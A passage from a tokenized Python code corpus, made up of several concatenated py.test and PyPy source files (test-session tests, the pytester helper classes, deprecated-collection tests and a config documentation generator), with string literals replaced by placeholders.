"<STR_LIT>" <EOL> assert loopstate . shuttingdown <EOL> session . queueevent ( "<STR_LIT>" , node = node , error = None ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . exitstatus == <NUM_LIT:0> <EOL> def test_nopending_but_collection_remains ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> session = DSession ( modcol . config ) <EOL> node = MockNode ( ) <EOL> session . addnode ( node ) <EOL> colreport = modcol . config . hook . pytest_make_collect_report ( collector = modcol ) <EOL> item1 , item2 = colreport . result <EOL> session . senditems_load ( [ item1 ] ) <EOL> rep = run ( item1 , node ) <EOL> session . queueevent ( "<STR_LIT>" , report = run ( item1 , node ) ) <EOL> session . queueevent ( "<STR_LIT>" , report = colreport ) <EOL> loopstate = session . _initloopstate ( [ ] ) <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . exitstatus is None , "<STR_LIT>" <EOL> assert not loopstate . colitems <EOL> session . loop_once ( loopstate ) <EOL> assert loopstate . colitems == colreport . result <EOL> assert loopstate . exitstatus is None , "<STR_LIT>" <EOL> def test_dist_some_tests ( self , testdir ) : <EOL> p1 = testdir . makepyfile ( test_one = """<STR_LIT>""" ) <EOL> config = testdir . parseconfig ( '<STR_LIT>' , p1 , '<STR_LIT>' ) <EOL> dsession = DSession ( config ) <EOL> hookrecorder = testdir . getreportrecorder ( config ) . hookrecorder <EOL> dsession . main ( [ config . getfsnode ( p1 ) ] ) <EOL> rep = hookrecorder . popcall ( "<STR_LIT>" ) . report <EOL> assert rep . passed <EOL> rep = hookrecorder . popcall ( "<STR_LIT>" ) . report <EOL> assert rep . skipped <EOL> rep = hookrecorder . popcall ( "<STR_LIT>" ) . report <EOL> assert rep . failed <EOL> node = hookrecorder . popcall ( "<STR_LIT>" ) . node <EOL> assert node . gateway . spec . popen <EOL> def test_collected_function_causes_remote_skip ( testdir ) : <EOL> sub = testdir . mkpydir ( "<STR_LIT>" ) <EOL> sub . join ( "<STR_LIT>" ) . write ( py . code . Source ( """<STR_LIT>""" % str ( sub . ensure ( "<STR_LIT>" ) ) ) ) <EOL> result = testdir . runpytest ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" <EOL> ] ) <EOL> def test_teardownfails_one_function ( testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( p , '<STR_LIT>' , '<STR_LIT>' ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) </s>
<s> """<STR_LIT>""" <EOL> import py <EOL> import sys , os <EOL> import inspect <EOL> from py . __ . test . config import Config as pytestConfig <EOL> import hookspec <EOL> import subprocess <EOL> pytest_plugins = '<STR_LIT>' <EOL> def pytest_funcarg__linecomp ( request ) : <EOL> return LineComp ( ) <EOL> def pytest_funcarg__LineMatcher ( request ) : <EOL> return LineMatcher <EOL> def pytest_funcarg__testdir ( request ) : <EOL> tmptestdir = TmpTestdir ( request ) <EOL> return tmptestdir <EOL> def pytest_funcarg__reportrecorder ( request ) : <EOL> reprec = ReportRecorder ( py . _com . comregistry ) <EOL> request . addfinalizer ( lambda : reprec . comregistry . unregister ( reprec ) ) <EOL> return reprec <EOL> class RunResult : <EOL> def __init__ ( self , ret , outlines , errlines ) : <EOL> self . ret = ret <EOL> self . outlines = outlines <EOL> self . errlines = errlines <EOL> self . stdout = LineMatcher ( outlines ) <EOL> self . stderr = LineMatcher ( errlines ) <EOL> class TmpTestdir : <EOL> def __init__ ( self , request ) : <EOL> self . request = request <EOL> self . _pytest = request . getfuncargvalue ( "<STR_LIT>" ) <EOL> basetmp = request . config . ensuretemp ( "<STR_LIT>" ) <EOL> name = request . function . __name__ <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> try : <EOL> tmpdir = basetmp . mkdir ( name + str ( i ) ) <EOL> except py . error . EEXIST : <EOL> continue <EOL> break <EOL> self . tmpdir = tmpdir . mkdir ( name ) <EOL> self . plugins = [ ] <EOL> self . _syspathremove = [ ] <EOL> self . chdir ( ) <EOL> assert hasattr ( self , '<STR_LIT>' ) <EOL> self . request . addfinalizer ( self . finalize ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . tmpdir , ) <EOL> def Config ( self , comregistry = None , topdir = None ) : <EOL> if topdir is None : <EOL> topdir = self . tmpdir . dirpath ( ) <EOL> return pytestConfig ( comregistry , topdir = topdir ) <EOL> def finalize ( self ) : <EOL> for p in self . _syspathremove : <EOL> py . std . sys . path . remove ( p ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . _olddir . chdir ( ) <EOL> def getreportrecorder ( self , obj ) : <EOL> if isinstance ( obj , py . _com . Registry ) : <EOL> registry = obj <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> registry = obj . comregistry <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> registry = obj . pluginmanager . comregistry <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> registry = obj . config . pluginmanager . comregistry <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( obj , ) ) <EOL> assert isinstance ( registry , py . _com . Registry ) <EOL> reprec = ReportRecorder ( registry ) <EOL> reprec . hookrecorder = self . _pytest . gethookrecorder ( hookspec , registry ) <EOL> reprec . hook = reprec . hookrecorder . hook <EOL> return reprec <EOL> def chdir ( self ) : <EOL> old = self . tmpdir . chdir ( ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _olddir = old <EOL> def _makefile ( self , ext , args , kwargs ) : <EOL> items = kwargs . items ( ) <EOL> if args : <EOL> source = "<STR_LIT:\n>" . join ( map ( str , args ) ) <EOL> basename = self . request . function . __name__ <EOL> items . insert ( <NUM_LIT:0> , ( basename , source ) ) <EOL> ret = None <EOL> for name , value in items : <EOL> p = self . tmpdir . join ( name ) . new ( ext = ext ) <EOL> source = py . code . Source ( value ) <EOL> p . write ( str ( py . code . Source ( value ) ) . lstrip ( ) ) <EOL> if ret is None : <EOL> ret = p <EOL> return ret <EOL> def makefile ( self , ext , * args , ** kwargs ) : <EOL> return self . _makefile ( ext , args , kwargs ) <EOL> def makeconftest ( self , source ) : <EOL> return self . makepyfile ( conftest = source ) <EOL> def makepyfile ( self , * args , ** kwargs ) : <EOL> return self . _makefile ( '<STR_LIT>' , args , kwargs ) <EOL> def maketxtfile ( self , * args , ** kwargs ) : <EOL> return self . _makefile ( '<STR_LIT>' , args , kwargs ) <EOL> def syspathinsert ( self , path = None ) : <EOL> if path is None : <EOL> path = self . tmpdir <EOL> py . std . sys . path . insert ( <NUM_LIT:0> , str ( path ) ) <EOL> self . _syspathremove . append ( str ( path ) ) <EOL> def mkdir ( self , name ) : <EOL> return self . tmpdir . mkdir ( name ) <EOL> def mkpydir ( self , name ) : <EOL> p = self . mkdir ( name ) <EOL> p . ensure ( "<STR_LIT>" ) <EOL> return p <EOL> def genitems ( self , colitems ) : <EOL> return list ( self . session . genitems ( colitems ) ) <EOL> def inline_genitems ( self , * args ) : <EOL> config = self . parseconfig ( * args ) <EOL> session = config . initsession ( ) <EOL> rec = self . getreportrecorder ( config ) <EOL> colitems = [ config . getfsnode ( arg ) for arg in config . args ] <EOL> items = list ( session . genitems ( colitems ) ) <EOL> return items , rec <EOL> def runitem ( self , source ) : <EOL> item = self . getitem ( source ) <EOL> testclassinstance = self . request . function . im_self <EOL> runner = testclassinstance . getrunner ( ) <EOL> return runner ( item ) <EOL> def inline_runsource ( self , source , * cmdlineargs ) : <EOL> p = self . makepyfile ( source ) <EOL> l = list ( cmdlineargs ) + [ p ] <EOL> return self . inline_run ( * l ) <EOL> def inline_runsource1 ( self , * args ) : <EOL> args = list ( args ) <EOL> source = args . pop ( ) <EOL> p = self . makepyfile ( source ) <EOL> l = list ( args ) + [ p ] <EOL> reprec = self . inline_run ( * l ) <EOL> reports = reprec . getreports ( "<STR_LIT>" ) <EOL> assert len ( reports ) == <NUM_LIT:1> , reports <EOL> return reports [ <NUM_LIT:0> ] <EOL> def inline_run ( self , * args ) : <EOL> config = self . parseconfig ( * args ) <EOL> config . pluginmanager . do_configure ( config ) <EOL> session = config . initsession ( ) <EOL> reprec = self . getreportrecorder ( config ) <EOL> session . main ( ) <EOL> config . pluginmanager . do_unconfigure ( config ) <EOL> return reprec <EOL> def config_preparse ( self ) : <EOL> config = self . Config ( ) <EOL> for plugin in self . plugins : <EOL> if isinstance ( plugin , str ) : <EOL> config . pluginmanager . import_plugin ( plugin ) <EOL> else : <EOL> if isinstance ( plugin , dict ) : <EOL> plugin = PseudoPlugin ( plugin ) <EOL> if not config . pluginmanager . isregistered ( plugin ) : <EOL> config . pluginmanager . register ( plugin ) <EOL> return config <EOL> def parseconfig ( self , * args ) : <EOL> if not args : <EOL> args = ( self . tmpdir , ) <EOL> config = self . config_preparse ( ) <EOL> args = list ( args ) + [ "<STR_LIT>" % self . tmpdir . dirpath ( '<STR_LIT>' ) ] <EOL> config . parse ( args ) <EOL> return config <EOL> def parseconfigure ( self , * args ) : <EOL> config = self . parseconfig ( * args ) <EOL> config . pluginmanager . do_configure ( config ) <EOL> return config <EOL> def getitem ( self , source , funcname = "<STR_LIT>" ) : <EOL> modcol = self . getmodulecol ( source ) <EOL> moditems = modcol . collect ( ) <EOL> for item in modcol . collect ( ) : <EOL> if item . name == funcname : <EOL> return item <EOL> else : <EOL> assert <NUM_LIT:0> , "<STR_LIT>" % ( funcname , source ) <EOL> def getitems ( self , source ) : <EOL> modcol = self . getmodulecol ( source ) <EOL> return list ( modcol . config . initsession ( ) . genitems ( [ modcol ] ) ) <EOL> def getfscol ( self , path , configargs = ( ) ) : <EOL> self . config = self . parseconfig ( path , * configargs ) <EOL> self . session = self . config . initsession ( ) <EOL> return self . config . getfsnode ( path ) <EOL> def getmodulecol ( self , source , configargs = ( ) , withinit = False ) : <EOL> kw = { self . request . function . __name__ : py . code . Source ( source ) . strip ( ) } <EOL> path = self . makepyfile ( ** kw ) <EOL> if withinit : <EOL> self . makepyfile ( __init__ = "<STR_LIT:#>" ) <EOL> self . config = self . parseconfig ( path , * configargs ) <EOL> self . session = self . config . initsession ( ) <EOL> self . config . pluginmanager . import_plugin ( "<STR_LIT>" ) <EOL> plugin = self . config . pluginmanager . getplugin ( "<STR_LIT>" ) <EOL> plugin . pytest_configure ( config = self . config ) <EOL> return self . config . getfsnode ( path ) <EOL> def prepare ( self ) : <EOL> p = self . tmpdir . join ( "<STR_LIT>" ) <EOL> if not p . check ( ) : <EOL> plugins = [ x for x in self . plugins if isinstance ( x , str ) ] <EOL> if not plugins : <EOL> return <EOL> p . write ( "<STR_LIT>" % plugins ) <EOL> else : <EOL> if self . plugins : <EOL> print "<STR_LIT>" , p <EOL> def popen ( self , cmdargs , stdout , stderr , ** kw ) : <EOL> if not hasattr ( py . std , '<STR_LIT>' ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> env = os . environ . copy ( ) <EOL> env [ '<STR_LIT>' ] = "<STR_LIT::>" . join ( filter ( None , [ <EOL> str ( os . getcwd ( ) ) , env . get ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) <EOL> kw [ '<STR_LIT>' ] = env <EOL> return py . std . subprocess . Popen ( cmdargs , stdout = stdout , stderr = stderr , ** kw ) <EOL> def run ( self , * cmdargs ) : <EOL> self . prepare ( ) <EOL> old = self . tmpdir . chdir ( ) <EOL> try : <EOL> return self . _run ( * cmdargs ) <EOL> finally : <EOL> old . chdir ( ) <EOL> def _run ( self , * cmdargs ) : <EOL> cmdargs = map ( str , cmdargs ) <EOL> p1 = py . path . local ( "<STR_LIT>" ) <EOL> p2 = py . path . local ( "<STR_LIT>" ) <EOL> print "<STR_LIT>" , cmdargs , "<STR_LIT>" , py . path . local ( ) <EOL> f1 = p1 . open ( "<STR_LIT:w>" ) <EOL> f2 = p2 . open ( "<STR_LIT:w>" ) <EOL> popen = self . popen ( cmdargs , stdout = f1 , stderr = f2 , <EOL> close_fds = ( sys . platform != "<STR_LIT:win32>" ) ) <EOL> ret = popen . wait ( ) <EOL> f1 . close ( ) <EOL> f2 . close ( ) <EOL> out , err = p1 . readlines ( cr = <NUM_LIT:0> ) , p2 . readlines ( cr = <NUM_LIT:0> ) <EOL> if err : <EOL> for line in err : <EOL> print >> py . std . sys . stderr , line <EOL> if out : <EOL> for line in out : <EOL> print >> py . std . sys . stdout , line <EOL> return RunResult ( ret , out , err ) <EOL> def runpybin ( self , scriptname , * args ) : <EOL> fullargs = self . _getpybinargs ( scriptname ) + args <EOL> return self . run ( * fullargs ) <EOL> def _getpybinargs ( self , scriptname ) : <EOL> bindir = py . path . local ( py . __file__ ) . dirpath ( "<STR_LIT>" ) <EOL> script = bindir . join ( scriptname ) <EOL> assert script . check ( ) <EOL> return py . std . sys . executable , script <EOL> def runpython ( self , script ) : <EOL> return self . run ( py . std . sys . executable , script ) <EOL> def runpytest ( self , * args ) : <EOL> p = py . path . local . make_numbered_dir ( prefix = "<STR_LIT>" , <EOL> keep = None , rootdir = self . tmpdir ) <EOL> args = ( '<STR_LIT>' % p , ) + args <EOL> return self . runpybin ( "<STR_LIT>" , * args ) <EOL> def spawn_pytest ( self , string , expect_timeout = <NUM_LIT> ) : <EOL> pexpect = py . test . importorskip ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> basetemp = self . tmpdir . mkdir ( "<STR_LIT>" ) <EOL> invoke = "<STR_LIT>" % self . _getpybinargs ( "<STR_LIT>" ) <EOL> cmd = "<STR_LIT>" % ( invoke , basetemp , string ) <EOL> child = pexpect . spawn ( cmd , logfile = basetemp . join ( "<STR_LIT>" ) . open ( "<STR_LIT:w>" ) ) <EOL> child . timeout = expect_timeout <EOL> return child <EOL> class PseudoPlugin : <EOL> def __init__ ( self , vars ) : <EOL> self . __dict__ . update ( vars ) <EOL> class ReportRecorder ( object ) : <EOL> def __init__ ( self , comregistry ) : <EOL> self . comregistry = comregistry <EOL> comregistry . register ( self ) <EOL> def getcall ( self , name ) : <EOL> return self . hookrecorder . getcall ( name ) <EOL> def popcall ( self , name ) : <EOL> return self . hookrecorder . popcall ( name ) <EOL> def getcalls ( self , names ) : <EOL> """<STR_LIT>""" <EOL> return self . hookrecorder . getcalls ( names ) <EOL> def getreports ( self , names = "<STR_LIT>" ) : <EOL> return [ x . report for x in self . getcalls ( names ) ] <EOL> def matchreport ( self , inamepart = "<STR_LIT>" , names = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> l = [ ] <EOL> for rep in self . getreports ( names = names ) : <EOL> colitem = rep . getnode ( ) <EOL> if not inamepart or inamepart in colitem . listnames ( ) : <EOL> l . append ( rep ) <EOL> if not l : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( inamepart , ) ) <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" % ( <EOL> inamepart , l ) ) <EOL> return l [ <NUM_LIT:0> ] <EOL> def getfailures ( self , names = '<STR_LIT>' ) : <EOL> return [ rep for rep in self . getreports ( names ) if rep . failed ] <EOL> def getfailedcollections ( self ) : <EOL> return self . getfailures ( '<STR_LIT>' ) <EOL> def listoutcomes ( self ) : <EOL> passed = [ ] <EOL> skipped = [ ] <EOL> failed = [ ] <EOL> for rep in self . getreports ( "<STR_LIT>" ) : <EOL> if rep . passed : <EOL> if rep . when == "<STR_LIT>" : <EOL> passed . append ( rep ) <EOL> elif rep . skipped : <EOL> skipped . append ( rep ) <EOL> elif rep . failed : <EOL> failed . append ( rep ) <EOL> return passed , skipped , failed <EOL> def countoutcomes ( self ) : <EOL> return map ( len , self . listoutcomes ( ) ) <EOL> def assertoutcome ( self , passed = <NUM_LIT:0> , skipped = <NUM_LIT:0> , failed = <NUM_LIT:0> ) : <EOL> realpassed , realskipped , realfailed = self . listoutcomes ( ) <EOL> assert passed == len ( realpassed ) <EOL> assert skipped == len ( realskipped ) <EOL> assert failed == len ( realfailed ) <EOL> def clear ( self ) : <EOL> self . hookrecorder . calls [ : ] = [ ] <EOL> def unregister ( self ) : <EOL> self . comregistry . unregister ( self ) <EOL> self . hookrecorder . finish_recording ( ) <EOL> def test_reportrecorder ( testdir ) : <EOL> registry = py . _com . Registry ( ) <EOL> recorder = testdir . getreportrecorder ( registry ) <EOL> assert not recorder . getfailures ( ) <EOL> item = testdir . getitem ( "<STR_LIT>" ) <EOL> class rep : <EOL> excinfo = None <EOL> passed = False <EOL> failed = True <EOL> skipped = False <EOL> when = "<STR_LIT>" <EOL> recorder . hook . pytest_runtest_logreport ( report = rep ) <EOL> failures = recorder . getfailures ( ) <EOL> assert failures == [ rep ] <EOL> failures = recorder . getfailures ( ) <EOL> assert failures == [ rep ] <EOL> class rep : <EOL> excinfo = None <EOL> passed = False <EOL> failed = False <EOL> skipped = True <EOL> when = "<STR_LIT>" <EOL> rep . passed = False <EOL> rep . skipped = True <EOL> recorder . hook . pytest_runtest_logreport ( report = rep ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> rep = modcol . config . hook . pytest_make_collect_report ( collector = modcol ) <EOL> rep . passed = False <EOL> rep . failed = True <EOL> rep . skipped = False <EOL> recorder . hook . pytest_collectreport ( report = rep ) <EOL> passed , skipped , failed = recorder . listoutcomes ( ) <EOL> assert not passed and skipped and failed <EOL> numpassed , numskipped , numfailed = recorder . countoutcomes ( ) <EOL> assert numpassed == <NUM_LIT:0> <EOL> assert numskipped == <NUM_LIT:1> <EOL> assert numfailed == <NUM_LIT:1> <EOL> assert len ( recorder . getfailedcollections ( ) ) == <NUM_LIT:1> <EOL> recorder . unregister ( ) <EOL> recorder . clear ( ) <EOL> recorder . hook . pytest_runtest_logreport ( report = rep ) <EOL> py . test . raises ( ValueError , "<STR_LIT>" ) <EOL> class LineComp : <EOL> def __init__ ( self ) : <EOL> self . stringio = py . std . StringIO . StringIO ( ) <EOL> def assert_contains_lines ( self , lines2 ) : <EOL> """<STR_LIT>""" <EOL> __tracebackhide__ = True <EOL> val = self . stringio . getvalue ( ) <EOL> self . stringio . truncate ( <NUM_LIT:0> ) <EOL> lines1 = val . split ( "<STR_LIT:\n>" ) <EOL> return LineMatcher ( lines1 ) . fnmatch_lines ( lines2 ) <EOL> class LineMatcher : <EOL> def __init__ ( self , lines ) : <EOL> self . lines = lines <EOL> def str ( self ) : <EOL> return "<STR_LIT:\n>" . join ( self . lines ) <EOL> def fnmatch_lines ( self , lines2 ) : <EOL> if isinstance ( lines2 , str ) : <EOL> lines2 = py . code . Source ( lines2 ) <EOL> if isinstance ( lines2 , py . code . Source ) : <EOL> lines2 = lines2 . strip ( ) . lines <EOL> from fnmatch import fnmatch <EOL> __tracebackhide__ = True <EOL> lines1 = self . lines [ : ] <EOL> nextline = None <EOL> extralines = [ ] <EOL> for line in lines2 : <EOL> nomatchprinted = False <EOL> while lines1 : <EOL> nextline = lines1 . pop ( <NUM_LIT:0> ) <EOL> if line == nextline : <EOL> print "<STR_LIT>" , repr ( line ) <EOL> break <EOL> elif fnmatch ( nextline , line ) : <EOL> print "<STR_LIT>" , repr ( line ) <EOL> print "<STR_LIT>" , repr ( nextline ) <EOL> break <EOL> else : <EOL> if not nomatchprinted : <EOL> print "<STR_LIT>" , repr ( line ) <EOL> nomatchprinted = True <EOL> print "<STR_LIT>" , repr ( nextline ) <EOL> extralines . append ( nextline ) <EOL> else : <EOL> if line != nextline : <EOL> raise AssertionError ( "<STR_LIT>" % line ) <EOL> extralines . extend ( lines1 ) <EOL> return extralines <EOL> def test_parseconfig ( testdir ) : <EOL> config1 = testdir . parseconfig ( ) <EOL> config2 = testdir . parseconfig ( ) <EOL> assert config2 != config1 <EOL> assert config1 != py . test . config <EOL> def test_testdir_runs_with_plugin ( testdir ) : <EOL> testdir . makepyfile ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( ) <EOL> assert result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" <EOL> ] ) </s>
<s> import py <EOL> class TestCollectDeprecated : <EOL> def test_collect_with_deprecated_run_and_join ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> p = testdir . makepyfile ( somefile = """<STR_LIT>""" ) <EOL> config = testdir . parseconfig ( ) <EOL> dirnode = config . getfsnode ( p . dirpath ( ) ) <EOL> colitems = dirnode . collect ( ) <EOL> w = recwarn . pop ( DeprecationWarning ) <EOL> assert w . filename . find ( "<STR_LIT>" ) != - <NUM_LIT:1> <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> modcol = colitems [ <NUM_LIT:0> ] <EOL> assert modcol . name == "<STR_LIT>" <EOL> colitems = modcol . collect ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> assert len ( colitems ) == <NUM_LIT:2> <EOL> assert colitems [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> assert colitems [ <NUM_LIT:1> ] . name == '<STR_LIT>' <EOL> clscol = colitems [ <NUM_LIT:1> ] <EOL> colitems = clscol . collect ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> icol = colitems [ <NUM_LIT:0> ] <EOL> colitems = icol . collect ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> assert colitems [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> def test_collect_with_deprecated_join_but_no_run ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> col = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> colitems = col . collect ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> funcitem = colitems [ <NUM_LIT:0> ] <EOL> assert funcitem . name == "<STR_LIT>" <EOL> def test_function_custom_run ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> funcitem = modcol . collect ( ) [ <NUM_LIT:0> ] <EOL> assert funcitem . name == '<STR_LIT>' <EOL> recwarn . clear ( ) <EOL> funcitem . _deprecated_testexecution ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> def test_function_custom_execute ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> funcitem = modcol . collect ( ) [ <NUM_LIT:0> ] <EOL> assert funcitem . name == '<STR_LIT>' <EOL> funcitem . _deprecated_testexecution ( ) <EOL> w = recwarn . pop ( DeprecationWarning ) <EOL> assert w . filename . find ( "<STR_LIT>" ) != - <NUM_LIT:1> <EOL> def test_function_deprecated_run_execute ( self , testdir , recwarn ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> funcitem = modcol . collect ( ) [ <NUM_LIT:0> ] <EOL> recwarn . clear ( ) <EOL> funcitem . _deprecated_testexecution ( ) <EOL> recwarn . pop ( DeprecationWarning ) <EOL> def test_function_deprecated_run_recursive ( self , testdir ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> modcol = testdir . getmodulecol ( "<STR_LIT>" ) <EOL> colitems = py . test . deprecated_call ( modcol . collect ) <EOL> funcitem = colitems [ <NUM_LIT:0> ] <EOL> def test_conftest_subclasses_Module_with_non_pyfile ( self , testdir ) : <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> testme = testdir . makefile ( '<STR_LIT>' , testme = "<STR_LIT:hello>" ) <EOL> config = testdir . parseconfig ( testme ) <EOL> col = config . getfsnode ( testme ) <EOL> assert col . collect ( ) == [ ] </s>
<s> import pypy . annotation . model </s>
<s> import py <EOL> from py . __ . rest . rst import Rest , Paragraph , Strong , ListItem , Title , Link <EOL> from py . __ . rest . rst import Directive , Em , Quote , Text <EOL> from pypy . config . config import ChoiceOption , BoolOption , StrOption , IntOption <EOL> from pypy . config . config import FloatOption , OptionDescription , Option , Config <EOL> from pypy . config . config import ArbitraryOption , DEFAULT_OPTION_NAME <EOL> from pypy . config . config import _getnegation <EOL> configdocdir = py . magic . autopath ( ) . dirpath ( ) . dirpath ( ) . join ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def get_fullpath ( opt , path ) : <EOL> if path : <EOL> return "<STR_LIT>" % ( path , opt . _name ) <EOL> else : <EOL> return opt . _name <EOL> def get_cmdline ( cmdline , fullpath ) : <EOL> if cmdline is DEFAULT_OPTION_NAME : <EOL> return '<STR_LIT>' % ( fullpath . replace ( '<STR_LIT:.>' , '<STR_LIT:->' ) , ) <EOL> else : <EOL> return cmdline <EOL> class __extend__ ( Option ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> fullpath = get_fullpath ( self , path ) <EOL> result = Rest ( <EOL> Title ( fullpath , abovechar = "<STR_LIT:=>" , belowchar = "<STR_LIT:=>" ) , <EOL> Directive ( "<STR_LIT>" ) , <EOL> Paragraph ( Link ( "<STR_LIT>" , path + "<STR_LIT>" ) ) , <EOL> Title ( "<STR_LIT>" ) , <EOL> ListItem ( Strong ( "<STR_LIT>" ) , self . _name ) , <EOL> ListItem ( Strong ( "<STR_LIT>" ) , self . doc ) ) <EOL> if self . cmdline is not None : <EOL> cmdline = get_cmdline ( self . cmdline , fullpath ) <EOL> result . add ( ListItem ( Strong ( "<STR_LIT>" ) , cmdline ) ) <EOL> return result <EOL> class __extend__ ( ChoiceOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( ChoiceOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , <EOL> * [ ListItem ( str ( val ) ) for val in self . values ] ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> requirements = [ ] <EOL> for val in self . values : <EOL> if val not in self . _requires : <EOL> continue <EOL> req = self . _requires [ val ] <EOL> requirements . append ( ListItem ( "<STR_LIT>" % ( val , ) , <EOL> * [ ListItem ( Link ( opt , opt + "<STR_LIT>" ) , <EOL> "<STR_LIT>" % ( rval , ) ) <EOL> for ( opt , rval ) in req ] ) ) <EOL> if requirements : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , * requirements ) ) <EOL> return content <EOL> class __extend__ ( BoolOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( BoolOption , self ) . make_rest_doc ( path ) <EOL> fullpath = get_fullpath ( self , path ) <EOL> if self . negation and self . cmdline is not None : <EOL> if self . cmdline is DEFAULT_OPTION_NAME : <EOL> cmdline = '<STR_LIT>' % ( fullpath . replace ( '<STR_LIT:.>' , '<STR_LIT:->' ) , ) <EOL> else : <EOL> cmdline = self . cmdline <EOL> neg_cmdline = [ "<STR_LIT>" + _getnegation ( argname . lstrip ( "<STR_LIT:->" ) ) <EOL> for argname in cmdline . split ( ) <EOL> if argname . startswith ( "<STR_LIT>" ) ] [ <NUM_LIT:0> ] <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , <EOL> neg_cmdline ) ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> if self . _requires is not None : <EOL> requirements = [ ListItem ( Link ( opt , opt + "<STR_LIT>" ) , <EOL> "<STR_LIT>" % ( rval , ) ) <EOL> for ( opt , rval ) in self . _requires ] <EOL> if requirements : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , * requirements ) ) <EOL> if self . _suggests is not None : <EOL> suggestions = [ ListItem ( Link ( opt , opt + "<STR_LIT>" ) , <EOL> "<STR_LIT>" % ( rval , ) ) <EOL> for ( opt , rval ) in self . _suggests ] <EOL> if suggestions : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , * suggestions ) ) <EOL> return content <EOL> class __extend__ ( IntOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( IntOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> return content <EOL> class __extend__ ( FloatOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( FloatOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> return content <EOL> class __extend__ ( StrOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( StrOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> return content <EOL> class __extend__ ( ArbitraryOption ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> content = super ( ArbitraryOption , self ) . make_rest_doc ( path ) <EOL> content . add ( ListItem ( Strong ( 